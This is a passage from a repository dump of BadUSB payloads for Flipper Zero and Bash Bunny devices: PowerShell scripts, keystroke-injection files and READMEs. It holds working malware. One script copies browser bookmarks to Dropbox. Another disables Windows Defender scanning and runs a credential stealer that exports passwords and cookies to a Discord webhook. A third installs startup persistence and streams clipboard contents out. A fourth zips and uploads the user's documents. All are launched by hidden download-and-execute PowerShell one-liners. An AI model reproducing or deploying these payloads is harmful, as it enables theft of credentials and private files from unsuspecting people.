Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Define the `DEFINE TARGET_URL example.com`\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/cApS-Troll/a.ps1",
    "content": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\n} \r\n"
  },
  {
    "path": "BashBunny/payloads/cApS-Troll/payload.txt",
    "content": "REM     Title: cApS-Troll\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK\r\n\r\nREM     Target: Windows 10\r\n\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "BashBunny/payloads/placeholder",
    "content": "\n"
  },
  {
    "path": "FlipperZero/payloads/Bookmark-Hog/BH.ps1",
    "content": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The chrome bookmark file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The edge bookmark file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR ACCESS TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "FlipperZero/payloads/Bookmark-Hog/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Bookmark-Hog\n\nA payload to exfiltrate bookmarks of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the bookmark history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Bookmark-Hog/payload.txt",
    "content": "REM     Title: Bookmark-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate bookmarks to the FlipperZero\r\nREM     Target: Windows 10, 11\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\n"
  },
  {
    "path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Devil!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Browser-Devil\n\nA payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\n\n## Description\n\nThis payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe\nThis payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nFinally, dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Admin Priveladges on the Device you are targeting\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n* [Exe Author](https://github.com/moonD4rk/HackBrowserData)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1",
    "content": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n    [parameter(Position=0,Mandatory=$False)]\n    [string]$file,\n    [parameter(Position=1,Mandatory=$False)]\n    [string]$text \n)\n\n$hookurl = 'YOUR-DISCORD-WEBHOOK'\n\n$Body = @{\n  'username' = $env:username\n  'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\n\n\n# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download\nAdd-MpPreference -ExclusionPath $env:tmp\n\n# Download the exe and save it to temp directory\niwr \"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true\" -outfile \"$env:tmp\\browser.exe\"\n\n# Execute the Browser Stealer\ncd $env:tmp;Start-Process -FilePath \"$env:tmp\\browser.exe\" -WindowStyle h -Wait\n\n# Exfiltrate the loot to discord\nCompress-Archive -Path \"$env:tmp\\results\" -DestinationPath $env:tmp\\browserdata.zip\nUpload-Discord -file \"$env:tmp\\browserdata.zip\"\n"
  },
  {
    "path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt",
    "content": "REM     Title: Browser-Devil\nREM     Author: atomiczsec\nREM     Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nREM     Target: Windows 10\nDELAY 2000\nGUI r \nDELAY 1000\nSTRING powershell saps powershell -verb runas\nENTER\nDELAY 1000\nALT y\nDELAY 1000\nSTRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex\nENTER\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly"
  },
  {
    "path": "FlipperZero/payloads/Copy-And-Waste/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "FlipperZero/payloads/Copy-And-Waste/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Copy-And-Waste\n\nA payload to exfiltrate clipboard contents\n\n## Description\n\nThis payload uses iwr to download 2 files \n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, waiting for a Ctrl + C or Ctrl + X click \n\nThen the contents will then be sent to the discord webhook for viewing pleasure\n\nFor killing the script press both Ctrl buttons at the same time [It will resume at reboot]\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Copy-And-Waste/c.ps1",
    "content": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n  [CmdletBinding()]\r\n  param (    \r\n  [Parameter (Position=0,Mandatory = $True)]\r\n  [string]$con\r\n  ) \r\n  \r\n  $hookUrl = 'YOUR DISCORD WEBHOOK'\r\n  \r\n$Body = @{\r\n  'username' = $env:username\r\n  'content' = $con\r\n}\r\n\r\n\r\nInvoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body\r\n\r\n}\r\n\r\n\r\ndischat (get-clipboard)\r\n\r\nwhile (1){\r\n    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')\r\n    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)\r\n    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)\r\n    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)\r\n\r\n       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}\r\n       elseif ($Rctrl -and $Lctrl) {dischat \"---------connection lost----------\";exit}\r\n       else {continue}\r\n} "
  },
  {
    "path": "FlipperZero/payloads/Copy-And-Waste/payload.txt",
    "content": "REM     Title: Copy-And-Waste\r\nREM     Author: atomiczsec & I am Jakoby\r\nREM     Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook\r\nREM     Target: Windows 10, 11\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH\r\n"
  },
  {
    "path": "FlipperZero/payloads/Copy-And-Waste/placeholder",
    "content": "\n"
  },
  {
    "path": "FlipperZero/payloads/De-Bloater/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Water-UnMark\n\nA payload to get rid of the ugly windows activation watermark.\n\n## Description\nThis script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\n\n## Getting Started\n\n### Dependencies\n\n* Unactivated Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/De-Bloater/placeholder",
    "content": "\n"
  },
  {
    "path": "FlipperZero/payloads/Doc-Hog/d.ps1",
    "content": "function Doc-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n      'username' = $env:username\n      'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Files = Get-ChildItem -Path \"$env:HOMEPATH\" -Include \"*.docx\",\"*.doc\",\"*.pptx\",\"*.xlsx\",\"*.pdf\",\"*.jpeg\",\"*.png\",\"*.jpg\",\"*.csv\",\"*.txt\" -Recurse\n\n$types = @{\n    \"*.docx\" = \"Word\";\n    \"*.doc\" = \"Word\";\n    \"*.pptx\" = \"PowerPoint\";\n    \"*.xlsx\" = \"Excel\";\n    \"*.pdf\" = \"PDF\";\n    \"*.jpeg\" = \"JPEG\";\n    \"*.png\" = \"PNG\";\n    \"*.jpg\" = \"JPEG\";\n    \"*.csv\" = \"CSV\";\n    \"*.txt\" = \"Text\";\n}\n\nforeach ($type in $types.Keys) {\n    $filteredFiles = $Files | Where-Object {$_.Name -like $type}\n\n    if ($filteredFiles) {\n        $zipFile = \"$env:TEMP\\$($types[$type]).zip\"\n\n        $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n        Doc-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n    }\n}\n"
  },
  {
    "path": "FlipperZero/payloads/Doc-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr <URL TO DBOX> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "FlipperZero/payloads/Doc-Hog/readme.md",
    "content": "\r\n<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#getting-started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# Doc-Hog\r\n\r\nA payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV\r\n\r\n## Description\r\n\r\nThis payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and 